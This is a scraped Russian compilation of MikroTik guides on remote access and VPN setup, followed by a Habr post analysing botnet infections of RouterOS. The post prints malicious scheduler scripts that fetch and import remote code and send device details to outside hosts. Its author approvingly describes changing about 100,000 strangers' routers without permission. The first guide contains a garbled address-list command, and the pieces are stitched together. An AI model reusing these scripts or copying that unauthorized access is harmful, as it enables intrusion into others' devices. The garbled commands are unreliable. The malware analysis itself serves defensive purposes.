Разное

Доступ к mikrotik из интернета: Mikrotik-удаленный доступ к роутеру через интернет

Содержание

Mikrotik-удаленный доступ к роутеру через интернет

Если у вас настроен роутер Mikrotik со статическим IP адресом и вам нужен удаленный доступ к нему для администрирования? Вот две простых инструкции по настройке доступа на RouterOS.

СодержаниеПоказать

Настройка доступа через терминал

Запускаем winbox, скачать можно с официального сайта и запускаем терминал

 

В терминале по очереди вводим команды:

Системные администраторы делятся на тех, кто еще не делает бэкап, и тех, кто их уже делает. Народная мудрость.

Задать вопрос автору

/ip firewall filter add chain=input protocol=tcp dst-port=8291 disabled=no action=accept place-before 0

Этим правилом мы разрешим доступ для входящего трафика на порт 8291 из вне. И поднимаем это правило в верх всех правил фаервола.

/ip service set winbox address=0.0.0.0/0

А этим правилом, мы разрешаем любые подключения на роутер из интернета.

Важно! В целях безопасности и для защиты роутера от подбора паролей рекомендуется открывать доступ только для надежных подсетей или ip адресов!

Поэтому я не рекомендую использовать вышеуказанное правило, а рекомендую использовать для входа только разрешенные адреса и следующее правило.

/ip service set winbox address=192.168.1.0/193.33.98.108/32.193.169.3.24/32

Где 192.168.0.1 — адрес локальной сети

А 193.33.98.108 и 32.193.169.3.24/32 — адреса из сети интернет

Эти данные необходимо заменить на свои.

Настройка доступа через интерфейс winbox

Запускаем winbox и логинимся в нем

В боковом меню, выбираем IP-Firewall

Нажимаем + и добавляем новое правило

 

В правиле фаервола, указываем данные как на скриншотах

И сохраняем правило. После чего перемещаем его в самый верх списка.

Дело за малым, осталось добавить адреса подсетей, откуда мы разрешим подключаться консоли к роутеру.

Откроется окно

Двойным кликом открываем строчку с winbox и добавляем адреса, либо подсети для доступа к mikrotik

Стрелка вверх удаляет строку, стрелка в низ добавляет. Нажимаем ok, проверяем доступ из интернета, все должно работать! 🙂

Если тебе понравился материал, ставь палец вверх!

 

 

 

Доступ к MikroTik из интернета: настройка удаленного управления

789

Всем привет! Сегодня поговорим про проброс портов на роутере Mikrotik. Аппарат достаточно сложный в

975

Всем привет! И сегодня мы попробуем создать WiFi мост на маршрутизаторе Mikrotik. Будем работать

2 575

Всем, привет! Сегодня у нас будет короткий обзор вопроса: почему Микротик 951 режет скорость

6 827

Всех приветствую на нашем портале! В статье я постараюсь как можно короче, но понятно

Настройка удаленного доступа к роутеру MikroTik

Настройка удаленного доступа к роутеру MikroTik

Здравствуйте, Настройка удаленного доступа к роутеру MikroTik вещь очень нужная. Поэтому я в этой статье я хочу рассказать вам, как произвести  настройку удаленного доступа к роутеру MikroTik. Уверен что это пригодится вам когда вы  установили данный маршрутизатор  вашему клиенту. Данную информацию должен знать каждый системный администратор, который хочет иметь доступ к своему устройству MikroTik.  А так же закрыть брешь в прошивки RouterOS от подбора пароля.

Первое что я вам порекомендую это скачать Winbox с сайта MikroTik. Конечно и с Web интерфейса тоже можно осуществлять настройку и между Winbox и Веб интерфейсом отличий практически нет. Но утилита Winbox намного удобнее. Но не  буду отходить от темы.

Настройка доступа:

После того как вы  подключились к роутеру, выбираем пункты меню слева:

IP — Firewall

Настройка удаленного доступа к роутеру MikroTik

В открывшемся окне на вкладке Filter Rules нажимаем на кнопку с синим плюсом, это  действие добавит новое правило. В открывшемся окне нам следует указать следующие параметры, как на картинке:

Chain: input

Protocol: TCP

Dst. Port: Это открытый порт на роутере MikroTik. Например для доступа через веб-интерфейс требуется открыть  — 80 порт.  Через программу WinBox нужен — 8291 порт , через Telnet — 23.

Далее переходим на вкладку Action и выбираем accept.

Настройка FireWall MikroTik

 

Рекомендую вам комментировать всегда комментировать правила в Фаерволе, даже самое незначительное. Данные вещи имеют свойство очень быстро забываться. Для того чтоб написать комментарий к правилу.  Выбираем правило которое надо закомментировать,  нажимаем «Comment».

Настройка FireWall MikroTik

Нажимаем «Apply» или «Ok».

После того как вы создали  правила, в главном окне «Firewall« на вкладке «Filter Rules». Требуется выставить правила, так как   все они работают согласно порядку, в котором они отображаются. То есть правило которое мы сделали нам необходимо поднять как можно выше, иначе оно работать не будет. Я помещаю созданные правила обычно сразу после правила на разрешение icmp-пакетов.

Ограничение удаленного доступа:

После настройки доступа к роутеру, его нужно сильно ограничить, чтобы злоумышленники не смогли заполучить доступ к вашему оборудованию. Переходим в следующее меню:

IP — Services

Настройка удаленного доступа к роутеру MikroTik

Далее выбираем службу, к которой настраивали доступ. Если это доступ через веб-интерфейс, то выбираем www. В появившемся окне в поле «Available From», добавляем ip-адреса, либо сети, из которых доступ разрешен. Можно разрешить доступ к роутеру из локальной сети, добавив сеть 192.168.x.0/24, помимо внешних адресов, с которых должен быть доступ к устройству. Обязательно добавьте в первую очередь адрес, с которого вы подключены к роутеру. После установки устройства его можно удалить.

Настройка удаленного доступа к роутеру MikroTik

 

Terminal MikroTik:

Через командную строку правила будут выглядеть следующим образом:

/ip firewall filter add chain=input protocol=tcp dst-port=80 disabled=no action=accept

Настройка удаленного доступа в маршрутизаторах Mikrotik — IT Blog

Открыть «IP» — «Firewall» — вкладку «Filter Rules».
Нажать «Add new» для добавления нового правила.

Далее установить следующие параметры:

Chain: input
Src. Address: тут можно указать IP адрес или сеть с которой разрешено подключаться, если разрешено всем, то не указываем.
Protocol: tcp
Dst. Port: 80 (или 8291 для Winbox, 21 для ftp, 22 для ssh, 23 для telnet, udp 161 для snmp)
Action: accept

Нажать «ОК» для добавления правила.

После этого в фаерволе, в конце списка будет создано правило. Так как оно будет последним, а перед ним стоит правило запрещающее все, то его необходимо перетянуть мышкой в самый верх, иначе от него не будет толку.

Через командную строку правила будут выглядеть следующим образом:

/ip firewall filter add chain=input protocol=tcp dst-port=80 disabled=no action=accept

Поднять вверх списка можно так (где 30 — ID добавленного правила):

/ip firewall filter print
/ip firewall filter move 30 destination=1

Либо в самой команде укажем что нужно расположить правило в самом начале списка:

/ip firewall filter add chain=input protocol=tcp dst-port=80 disabled=no action=accept place-before 0

Также в меню «IP» — «Services» в параметрах нужной службы можно добавить в «Available From» список IP адресов или сетей с которых необходимо разрешить доступ. Доступ ограничивается как для локальных так и внешних адресов, поэтому в первую очередь нужно добавить IP или сеть с которой вы в данный момент подключены.

Приведу пример указания IP адреса через терминал, например для telnet (аналогично ftp,www,ssh,winbox):

/ip service set telnet address=192.168.88.0/24,172.16.205.50/32,192.168.3.24/32

Смотрите также мою статью:
Настройка Hairpin NAT на RouterOS (Mikrotik)

Настройка удаленного доступа к рабочему месту средствами маршрутизаторов Mikrotik.

01.04.2020

В условиях действующих карантинных мероприятий и самоизоляции крайне важное значение приобретает возможность удаленной работы. Наиболее часто встречающаяся конфигурация – использование режима удаленного рабочего стола. Самый простой способ доступа – опубликовать сервис RDP на «белом» IP-адресе маршрутизатора организации. Однако, такая публикация небезопасна из-за возможных уязвимостей операционной системы. Гораздо более надежный метод – обеспечить первоначальное подключение клиентов по VPN с дальнейшим использованием сервиса удаленной работы. Основной целью данной статьи будет являться простота настройки, чтобы её мог выполнить рядовой пользователь.

VPN-доступ к удалённому рабочему месту можно организовать несколькими способами, но в данном примере мы рассмотрим простой способ, который сбалансирован по безопасности и сложности настройки. При этом способе можно подключаться к удалённому рабочему компьютеру используя стандартные средства вашей операционной системы, будь то Linux, Windows или MacOS, после чего вы сможете использовать нужные ресурсы своей корпоративной локальной сети.

VPN В данной схеме удалённого подключения, пользователь сначала выполняет VPN-соединение до маршрутизатора компании (в примере рассматривается оборудование компании MikroTik, работающее под управлением операционной системы RouterOS) и затем уже стандартными средствами к необходимому рабочему месту, будь это отдельный компьютер, терминальный сервер или виртуальная машина.

VPN RouterOS (операционная система на устройствах MikroTik) поддерживает разнообразные типы VPN, но в данном примере мы будем настраивать L2TP-сервер на устройстве MikroTik с предварительным ключом шифрования, поскольку такая конфигурация обладает достаточной защищенностью и простотой настройки.

Все настройки в примере будут представлены в виде командной строки, но они полностью идентичны и соответствуют пунктам меню и иерархии визуального представления, при настройке RouterOS с использованием графического интерфейса программы Winbox или вэб-интерфейса.

Все В статье подразумевается, что маршрутизатор MikroTik уже имеет основные настройки и предоставляет доступ в Интернет. Также предполагается, что провайдер предоставляет подключение с «белым статическим адресом» — адресом, который постоянен и доступен напрямую из сети Интернет. Обычно такая услуга платная, но вполне доступна как для организаций, так и частных лиц.

1. В первую очередь мы создадим пользователя, логин и пароль которого будут использоваться для подключения к устройству:
/ppp secret add name=User password=User123 local-address=172.16.16.1 remote-address=172.16.16.2 service=l2tp

Имя пользователя в примере (name=) будет User, пароль (password=) User123. Настоятельно рекомендуем вам использовать сложные связки логин/пароль для обеспечения подключения избыточной безопасностью. Для этого можно и нужно использовать в пароле спецсимволы. Пункт (local-address – это адрес роутера в созданном подключении, а (remote-address — адрес компьютера, с которого выполняется VPN-подключение. Пункт service определяет, в каком типе VPN-сервера будет использоваться данный профиль пользователя. В данном случае это L2TP-сервер.

2. Включение L2TP-сервера с заданными параметрами:
/interface l2tp-server server set enabled=yes use-ipsec=re
quired ipsec-secret=Qwert123 authentication=mschap2

Основным параметром здесь будет параметр authentication= отвечающий за метод аутентификации. Параметр ipsec-secret= отвечает за ключ предварительного шифрования ipsec. Для обеспечения безопасности мы рекомендуем использовать сложный ключ, который отвечает всем требованиям безопасности.

3. Если у вас на устройстве MikroTik настроен firewall, то необходимо открыть порты, используемые для подключения к L2TP-серверу устройства, а так же в работе IP-SEC. Список портов 1701/UDP,500/UDP (для IKE, для управления ключами шифрованияs), 4500/UDP (для IPSEC NAT-Traversal mode), 50/ESP (для IPSEC), 51/AH (для IPSEC):
/ip firewall filter
add action=accept chain=input comment=l2tp dst-port=500,1701,4500 protocol=udp
add action=accept chain=input comment=»Allow IPSec-esp» protocol=ipsec-esp
add action=accept chain=input comment=»Allow IPSec-ah» protocol=ipsec-ah

Необходимо «поднять» данные правила в списке правил firewall выше запрещающих правил, чтобы VPN-подключение не блокировалось.

После данных настроек, необходимо настроить подключение на клиентском компьютере (в данном примере за основу берется ОС Windows 10).

Создадим новое VPN-подключение. В свойствах указывается тип L2TP/IPsec с общим ключом, а также все необходимые параметры аутентификации. После этого клиентский компьютер готов к работе. Для других операционных систем настройка будет полностью аналогична.

После выполнения VPN-подключения, вы можете напрямую подключаться к ресурсам внутренней корпоративной сети, поскольку на устройстве MikroTik будут созданы все связанные маршруты и вы сможете напрямую подключаться к RDP-серверу или, скажем FTP-хранилищу.

Таким образом можно обеспечить своим сотрудникам безопасный доступ к ресурсам корпоративной себе или доступ к домашней сети, чтобы, например, мониторить видео-регистратор или использовать media-центр или домашнее хранилище.

Откуда угодно подключаемся к домашней сети

Прочитано:
18 616

Моя задача: разобрать действия которые нужно проделать на домашнем Микротике (2011UiAS-2HnD) чтобы можно было откуда угодно иметь возможность настроить VPN подключение и получить доступ к домашним сервисам, в моем случае такие сервисы как: ZM (следим за периметром возле дома), OwnCloud (собственная база заметок), Zabbix (мониторю состояние своих сервисов: + погоду и различные датчики).

Доступ к домашней сети будет организован посредством протокола PPTP, он представляет из себя связку протокола TCP (для передачи данных) и GRE (для обертывания пакетов).

Схема организации туннеля до домашнего микротика:

  • Мне провайдер предоставляет статический IP-адрес
  • На Mikrotik создаем туннель
  • На Mikrotik создаем профили удаленного подключения (Логин и Пароль)
  • На Mikrotik создаем правила Firewall маршрутизации чтобы пройти сквозь брандмауэр

Первым делом подключаюсь через Winbox к своему Mikrotik’у и активирую PPTP сервер:

WinBOX — IP&MAC — меню PPP — вкладка Interface, после нажимаю PPTP Server

Enabled: отмечаю галочкой

MAX MTU: 1450

MAX MRU: 1450

Keepalive Timeout: 30

Default Profile: default

Authentication: должно быть отмечено только — mschap1 & mschap2

Теперь создаем пользователей удаленного подключения:

В разделе PPP переходим в меню Secrets и добавляем нового пользователя: Add —

Name: ekzorchik

Password: Aa1234567@@!!! (советую ставить пароль посложнее)

Service: pptp

Profile: default-encryption

Local Address: пишем IP-адрес Mikrotik, который будет выступать в роли Сервера VPN (192.168.1.9)

Remote Address: пишем IP-адрес пользователя (192.168.1.100)

Как только настройки произведены нажимаем Apply & OK для применения и сохранения.

Теперь переходим к настройки правил для Firewall моего Mikrotik чтобы он пропускал удаленные авторизованные подключения;

  • открываю порт 1723 (для TCP—протокола):

winbox — IP&MAC — IP — Firewall — вкладка Filter Rules — Add

вкладка General:

Chain: input

Protocol: 6 (tcp)

Dst. Port: 1723

вкладка Action:

Action: accept

  • открываю правило для GRE.

winbox — IP&MAC — IP — Firewall — вкладка Filter Rules — Add

вкладка General:

Chain: input

Protocol: 47 (gre)

вкладка Action:

Action: accept

Так выглядят правила в winbox’е:

На заметку: по умолчанию создаваемые правила помещаются в конец общего списка, а их нужно переместить наверх перед всеми запрещающими правилами, если этого не сделать работать они не будут.

Вот как бы и все, проверяю к примеру настройки подключения с работы из операционной системы Windows 7 Professional SP1:

Пуск — Панель управления — Центр управления сетями и общим доступом — Настройка нового подключения или сети — Подключение к рабочему месту — Использовать мое подключение к Интернету (VPN) :

  • Интернете-адрес: указываю внешний IP&DNS адрес выделяемый мне провайдером.
  • Имя местоназначения: VPN-HOME
  • Разрешить использовать это подключение другим пользователям: отмечаю галочкой

После указываю имя пользователя и пароль на удаленный доступ (данные идентификационные данные были введены выше):

  • Пользователь: ekzorchik
  • Пароль: Aa1234567@@!!!
  • Запомнить этот пароль: отмечаю галочкой

И после нажимаю «Подключить», если все сделано правильно то подключение будет установлено:

Также можно проверить, открыв оснастку «Центр управления сетями и общим доступом»

Также можно проверить, открыв консоль командной строки и отобразив IP адреса текущих сетевых адаптеров:

Win + R → cmd.exe

C:\Users\aollo>ipconfig

Настройка протокола IP для Windows

Адаптер PPP VPN-HOME:

DNS-суффикс подключения . . . . . :

IPv4-адрес. . . . . . . . . . . . : 192.168.1.100

Маска подсети . . . . . . . . . . : 255.255.255.255

Основной шлюз. . . . . . . . . : 0.0.0.0

Ethernet adapter Подключение по локальной сети:

DNS-суффикс подключения . . . . . :

IPv4-адрес. . . . . . . . . . . . : 10.9.9.47

Маска подсети . . . . . . . . . . : 255.255.255.0

Основной шлюз. . . . . . . . . : 10.9.9.1

Что теперь ну подключен я по VPN к дому, а что мне это дает, а то что теперь можно к примеру запустить браузер и подключиться к домашним ресурсам, если настроено удаленное включение компьютеров через Wake On Lan, то посредством запросов их можно включить, а после либо по VNC,RDP подключиться к ним.

Чтобы отключиться от VPN соединения, нужно возле часиков справа видите монитор с сетевой вилкой, нажимаете по нему левой кнопкой мыши, находите Ваше подключенное VPN соединение, наводите на него мышь (подключение выделяется) и через правый клик мышью выбираете меню «Отключить», а чтобы подключить все то же самое но выбираете меню «Подключить» — «Подключение»

Это все конечно же хорошо, а если Ваш провайдер не выдает Вам статический IP-адрес как у меня, как же быть. Но в этом Вам повезло, т. к. в самом Mikrotik есть служба на подобии DynDNS или No-IP которая может предоставить Вам DNS ссылку доступа к Вашему Mikrotik’у из вне, т. е.

WinBOX — IP&MAC — перехожу в раздел Quick Set, отмечаю галочкой VPN Access

Указываю пароль (VPN Password) и что я вижу, у меня есть внешний адрес вот в таком вот формате: <уникальный_индентификатор>.sn.mynetname.net, дефолтное имя пользователя и пароль которые я ввел только что выше.

C:\Users\aollo>ping <уникальный_индентификатор>.sn.mynetname.net

Обмен пакетами с <уникальный_индентификатор>.sn.mynetname.net [<мой_внешний_ip_адрес] с 32 байтами да

нных:

Ответ от [<мой_внешний_ip_адрес]: число байт=32 время=7мс TTL=58

Ответ от [<мой_внешний_ip_адрес]: число байт=32 время=8мс TTL=58

Статистика Ping для [<мой_внешний_ip_адрес]:

Пакетов: отправлено = 2, получено = 2, потеряно = 0

(0% потерь)

Приблизительное время приема-передачи в мс:

Минимальное = 7мсек, Максимальное = 8 мсек, Среднее = 7 мсек

Control-C

^C

Открываем меню настройки PPP, включаем его и при создании нового пользователя указываем: Name (VPN), Password (то что указали выше), Service (pptp), Profile (default-encryption), Local Address (192.168.1.9), Remote Address (192.168.1.101) и нажимаем Apply и OK

После проверяю настройки подключения с рабочей станции только вместо статического IP адреса уже указываю DNS-ссылку: <уникальный_индентификатор>.sn.mynetname.net

и подключение также успешно проходит.

Итого, как оказалось на Микротике достаточно быстро можно поднять PPTP сервис посредством которого можно быстро начать пользоваться VPN-соединением. Такие настройки одинаково работают, как для дома так и для корпоративной сети, в этом собственно и большой плюс данного вида оборудования, купив раз с запасом получаем инструмент где можно реализовать многое, а для малой компании это будет существенным подспорьем. На этом я прощаюсь и до новых заметок, с уважением автор блога — ekzorchik.

Для чего хакерам Микротик и как я спрятал 100 тыс. RouterOS от ботнета / Хабр

RouterOS очень мощный инструмент в руках профессионалов и ответственных специалистов. Но в руках новичков или тех, кто делает всё на «и так сойдёт» Mikrotik начинает жить своей жизнью и превращается в ноду ботнета.

Ещё в мае 2018 я писал статью с рекомендациями как защитить свой Микротик.

Как ни странно, но в сети до сих пор тысячи «открытых» роутеров Mikrotik и армия ботнета пополняется.

Я в свободное от работы и отдыха время искал уязвимые устройства по всей сети и делал настройки в соответствии со своими рекомендациями, то есть добавлял правила фаервола, которые закрывали доступ к роутеру не из локальной сети. В комментариях писал информацию об уязвимости и оставлял адрес телеграм-канала @router_os, где можно было мне задать интересующие вопросы (у нормального админа они должны были появиться).

С мая по сегодняшний день я «вырвал» из лап ботнета более 100 тысяч устройств Mikrotik.

Учитывая то, что я не могу выступить на MUM 2018 в Москве, то свой доклад я решил опубликовать на habr.com


В сети много аналитики как именно используются RouterOS хакерами (например здесь). Но моя статья основана лично на моём опыте.

Админы и их реакция

По всему миру админы маршрутизаторов рано или поздно обнаруживали у себя такую пасхалку.

/system note

/system note print

show-at-login: yes

note: I closed the vulnerability with a firewall. Please update RouterOS. You can say thanks on the WebMoney Z399578297824 or BTC 14qiYkk3nUgsdqQawiMLC1bUGDZWHowix1. My Telegram http://t.me/router_os

Большинство тихо закрывало дыру. Кто-то не поленились мне написать «спасибо». Но были и те, кто громко негодовал не разобравшись.Нормальный специалист должен адекватно реагировать когда ему указывают на его ошибку.

За всё время мне написало не более 50 человек…

Так как реакция пользователей была минимальна, то я пришёл к выводу, что подавляющее большинство даже и не заметит, что что-то на роутере не так. Поэтому я стал дорабатывать свой скрипт, который помимо правил фаервола будет удалять известные мне backdoors, которые оставили злоумышленники.

Логично, что мой метод устраивает не всех. Но другого подхода для выполнения данной задачи я не придумал ещё.

Хакеры любят RouterOS

В подавляющем большинстве случаев я попадал на устройство, которое уже кем-то заражено. Я, к сожалению, не сразу стал анализировать их содержимое. Вот что я нашёл и что будет верным признаком, что ваш роутер скомпрометирован.

Web-прокси и Socks

Самое банальное использование маршрутизатора через стандартные вэб и socks прокси. Если вы их не используете, но они включены, то просто выключите их.

/ip proxy set enabled=no

/ip socks set enabled=no


Но чтобы просто так не получилось выключить хакер добавляет в шедулер скрипт, которой прокси включит через некоторое время:

/system script

/system scheduler

add interval=10m name="port 54321" on-event="port 54321" policy=\

ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon \

start-date=sep/02/2018 start-time=20:35:53

/system script

add name="port 54321" owner=gateway policy=\

ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon source="/\

ip firewall filter remove [/ip firewall filter find where comment ~ \"port\

\_[0-9]*\"];/ip socks set enabled=yes port=54321 max-connections=255 conne\

ction-idle-timeout=60;/ip socks access remove [/ip socks access find];/ip \

firewall filter add chain=input protocol=tcp port=54321 action=accept comm\

ent=\"port 54321\";/ip firewall filter move [/ip firewall filter find comm\

ent=\"port 54321\"] 1;"

Вы можете обнаружить у себя файл webproxy/error.html который прокси вам подсовывает, а он в свою очередь вызывает майнер.

Лишние параметры появляются и здесь:

/ip proxy access print

/ip socks access print

Script может всё

В 90% дырявых Микротиков имеются скрипты /system script и для них настроено расписание выполнения /system scheduler.

По расписанию скачивается скрипт, которой в дальнейшем выполняется.

Установка майнера

/system scheduler

add interval=11h name=upd113 on-event="/tool fetch url=http://gotan.bit:31415/\

01/error.html mode=http dst-path=webproxy/error.html" policy=\

ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\

aug/20/2018 start-time=03:28:02

add interval=9h name=upd115 on-event=\

"/tool fetch url=http://gotan.bit:31415/01/u113.rsc mode=http" policy=\

ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\

aug/20/2018 start-time=03:28:02

add interval=9h name=upd116 on-event="/import u113.rsc" policy=\

ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\

aug/20/2018 start-time=03:28:12

add interval=1d name=Auto113 on-event="/system reboot" policy=\

ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\

aug/20/2018 start-time=03:00:00

/system script

add name=script4_ owner=nivel2 policy=\

ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch a\

ddress=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http keep-resu\

lt=no"

Ещё один вариант скрипта, который после применения пытается частично спрятаться.

/system scheduler

add interval=11s name=MTIT on-event="/system script run MTIT" policy=\

ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\

startup

add interval=25m name="DDNS Serv" on-event="/system script run iDDNS" policy=\

ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\

startup

/system script

add name=MTIT owner=admin policy=\

ftp,reboot,read,write,policy,test,password,sniff,sensitive source=\

"/ping 10.12.0.26 interface=ether4 count=10"

add name=iDDNS owner=admin policy=\

ftp,reboot,read,write,policy,test,password,sniff,sensitive source=":global\

\_mac [/interface ethernet get 1 mac-address]\r\

\n:global port ([/ip service get winbox port].\"_\".[/ip socks get port].\

\"_\".[/ip proxy get port])\r\

\n:global info ([/ip socks get enabled].\"_\".[/ip proxy get enabled].\"_\

\".[/interface pptp-server server get enabled])\r\

\n:global cmd \"/\$mac/\$port/\$info/dns\"\r\

\n/tool fetch address=91.134.24.238 src-path=\$cmd mode=http dst-path=dns;\

:delay 3s\r\

\n/import dns;:delay 4s;/file remove dns"

Таким образом у злоумышленников всегда есть возможность «скормить» новый скрипт и, например, провести масштабную DDOS атаку.Скрипты могут быть спрятаны везде

Поэтому проверяйте эти места тщательно. На чистом RouterOS эти места пустые.

DST-NAT

К моему большому удивлению, но много таких устройств, на которых завёрнут трафик через /ip firewall nat.Спам в dst-nat
/ip firewall nat

add action=masquerade chain=srcnat comment="default configuration"

add action=masquerade chain=srcnat

add action=dst-nat chain=dstnat dst-port=4444 protocol=tcp to-addresses=\

91.92.128.187 to-ports=4444

add action=dst-nat chain=dstnat dst-port=8008 protocol=tcp to-addresses=\

91.92.128.187 to-ports=4444

add action=dst-nat chain=dstnat dst-address=218.11.2.83 dst-port=8008 \

protocol=tcp to-addresses=91.92.128.187 to-ports=4444

add action=dst-nat chain=dstnat dst-address=218.11.2.83 dst-port=443 \

protocol=tcp to-addresses=91.92.128.187 to-ports=4444

add action=dst-nat chain=dstnat dst-address=218.11.2.83 dst-port=25 protocol=\

tcp to-addresses=91.92.128.187 to-ports=4444

add action=dst-nat chain=dstnat dst-address=51.15.39.52 dst-port=9999 \

protocol=tcp to-addresses=91.92.128.187 to-ports=4444

add action=dst-nat chain=dstnat dst-address=51.15.39.186 dst-port=9999 \

protocol=tcp to-addresses=91.92.128.187 to-ports=4444

add action=dst-nat chain=dstnat dst-address=51.15.89.69 dst-port=9999 \

protocol=tcp to-addresses=91.92.128.187 to-ports=4444

add action=dst-nat chain=dstnat dst-address=79.137.82.70 dst-port=9999 \

protocol=tcp to-addresses=91.92.128.187 to-ports=4444

add action=dst-nat chain=dstnat dst-address=79.137.82.104 dst-port=9999 \

protocol=tcp to-addresses=91.92.128.187 to-ports=4444

add action=dst-nat chain=dstnat dst-address=92.222.72.197 dst-port=9999 \

protocol=tcp to-addresses=91.92.128.187 to-ports=4444

add action=dst-nat chain=dstnat dst-address=92.222.180.118 dst-port=9999 \

protocol=tcp to-addresses=91.92.128.187 to-ports=4444

add action=dst-nat chain=dstnat dst-address=151.80.59.84 dst-port=9999 \

protocol=tcp to-addresses=91.92.128.187 to-ports=4444

Хороший способ скрыть свой реальный ip.

VPN

Как же без него. RouterOS умеет подымать различные виды vpn, но хакеры чаще всего используют pptp и L2TP.

Поэтому проверьте раздел /ppp secret

Даже если этот раздел пуст, то ушлые хакеры могут авторизоваться и через Radius.

Проверяем наличие записей /radius print

Если вы ничего не настраивали, то там должно быть пусто. В противном случае стоит очистить:
/radius remove numbers=[/radius find ]

И запретить использовать Radius
/ppp aaa set use-radius=no use-circuit-id-in-nas-port-id=no

Отключаем использование Radius для авторизации на устройстве
/user aaa set use-radius=no

Если вы не используйте vpn, то отключите его
/interface l2tp-server server set enabled=no

/interface pptp-server server set enabled=no

/interface sstp-server server set enabled=no

DNS static

Без фишига так же не обошлось. На роутерах в /ip dns static можно обнаружить и такое

Всё очень просто: вы в адресную строку вбиваете адрес сайта, который вы знаете, а фактически попадаете на сервер злоумышлинника.

Удаляем содержимое

/ip dns static remove numbers=[/ip dns static find]

Урезание прав админа

UPD: Так же есть группа роутеров, где хакер урезал права у admin и завёл своего с полными правами (например router и cnt), либо просто отбирает права и обновляет прошивку на последнюю.

содержимое /user в первом случае[router@MikroTik] > /user print
Flags: X — disabled
# NAME GROUP ADDRESS LAST-LOGGED-IN
0 ;;; system default user
admin admin sep/18/2018 15:08:45
1 dima full sep/14/2018 19:54:00
2 router full sep/26/2018 09:23:41

[router@MikroTik] > /user group print

0 name=«read» policy=local,telnet,ssh,reboot,read,test,winbox,password,web,sniff,sensitive,api,romon,tikapp,!ftp,!write,!policy,!dude skin=default

1 name=«write» policy=local,telnet,ssh,reboot,read,write,test,winbox,password,web,sniff,sensitive,api,romon,tikapp,!ftp,!policy,!dude skin=default

2 name=«full» policy=local,telnet,ssh,ftp,reboot,read,write,policy,test,winbox,password,web,sniff,sensitive,api,romon,dude,tikapp skin=default

3 name=«admin» policy=local,ftp,reboot,read,write,test,winbox,password,web,sniff,sensitive,api,!telnet,!ssh,!policy,!romon,!dude,!tikapp skin=default

Как вариант решения этой проблемы: через netinstall сделать downgrade на уязвимую прошивку и воспользоваться эксплоитом.

Packet Sniffer

Коллеги из Лаборатории Касперского упомянули кражу трафика по средствам его перенаправления на неизвестный узел.

Выключить его можно так:
/tool sniffer stop

/tool sniffer set streaming-enabled=no filter-ip-protocol="" filter-port="" filter-interface="" filter-stream=no

Проблема продукции Mikrotik

Абсолютно защищённых систем не существует. А массовое распространение продукции Mikrotik так же повлекло массовое изучение этих устройств.
Так как функционал RouterOS позволяет выполнять огромное количество задач он интересен и хакерам в том числе.

Из-за того, что продукт очень динамично развивается, то и скорость появления новых «дыр» тоже велико. Не смотря на это компания Микротик оперативно выпускает заплатки для своих систем.

Выход

На сегодняшний день единственным верным решением для защиты RouterOS — это корректно настроенный фаервол, который работает по принципу «запрещено всё, что явно не разрешено».
А всё потому, что Микротик использует классический фаервол Linux, который годами оттачивался армией специалистов.

Если требуется доступ к устройству из глобальной сети, то используйте принцип «port knocking». Принцип «fail2ban» себя не всегда оправдывает, так как всё равно обнаруживает устройство.

Глобальные решения

Режим ламера

В виду того, что устройства очень дешёвые, то их покупают пользователи, которые не имеют специальных знаний. Компании Mikrotik необходимо разработать интерфейс «ламера», который имеет минимальное количество настроек как и большинство SOHO роутеров. Причём он должен быть по умолчанию. А расширенный режим пользователь должен включить осознано сам. Текущий «Quick set» не достаточно хорош. Более того из-за изобилия кнопок юзер может и не заметить эту функцию.

Bug analyzer

Так же необходим модуль, который проводит анализ текущей конфигурации на возможные уязвимости и уведомляет пользователя, если считает, что роутер может быть скомпрометирован. Этот модуль должен подгружать «базу знаний», которую наполняют сотрудники Mikrotik на основании распространённых ошибок. А в случае серьёзных уязвимостей включать «аварийный» режим.
Если я смог систематизировать часть угроз, то разработчики и подавно…

FireWall — как услуга провайдеров

Рынок «умных» устройств очень бурно развиваются и они далеко не все хорошо защищены. Большинство людей, которые их приобретают, так же не владеют специальными знаниями, чтобы самостоятельно защитить свои гаджеты.

Поэтому интернет провайдерам пора создать коммерческую услугу по защите таких гаджетов. Банально пользователь в личном кабинете указывает какие порты открыть из интернета.

Так же провайдеры могут создать централизованную базу по существующим устройствам и их нормальным потребностям. Пользователь указывает в ЛК какие устройства у него используются. В случае нестандартного поведения такого устройства — уведомлять пользователя.

Я считаю, что рынок уже созрел для такой услуги.

В этой услуге есть следующие плюсы:

  1. Для провайдера ещё одна статья дохода
  2. Сокращение паразитного трафика
  3. Сокращаем рекрутинг устройств в ботнет
  4. Популяризация развивающихся услуг «умный дом»
  5. Пользователи могут дальше не заморачиваться своей безопасностью.

Немного о себе

Попытаюсь ответить на вопросы, которые наверняка мне зададут.

  1. Я работаю на должности не связанной с Mikrotik и сетями в общем.
  2. Тем не менее у меня есть сертификат MTCNA.
  3. Микротик — моё хобби. Всё, что я делаю — мне просто нравится. Так сказать «по фану».
  4. Почему не устроился на работу по профилю? Те кто в нашем городе покупает mikrotik много платить ЗП не могут. Те, кто может мне платить достойную ЗП — покупают cisco.
  5. В комментах в фаерволе я указывал свои кошельки, но с мая мне закинули всего около $40. В телеграм писали из разных стран, мол у них нет wmz, но всё равно «спасибо».

P.S.:

Поделитесь вашим опытом как ещё хакеры могут использовать Mikrotik.Руководство

: Обнаружение Интернета — MikroTik Wiki

Применимо к RouterOS: v6.41 +

Сводка

Detect Internet — это инструмент, который разделяет контролируемые интерфейсы на следующие состояния: Интернет, WAN, LAN, неизвестно и нет связи.

ЛВС

Все интерфейсы уровня 2 изначально находятся в этом состоянии.

WAN

Любой туннель L3 и интерфейсы LTE изначально будут иметь это состояние. Интерфейсы уровня 2 могут получить это состояние, если:

  • интерфейс имеет активный маршрут до 8.8.8.8.
  • Интерфейс

  • может получить (или получил) адрес от DHCP (не применяется, если DHCP-сервер также выполняет функцию «Обнаружение Интернета» на интерфейсе DHCP-сервера).

Примечание. Интерфейс WAN может вернуться в состояние LAN только при изменении статуса соединения.

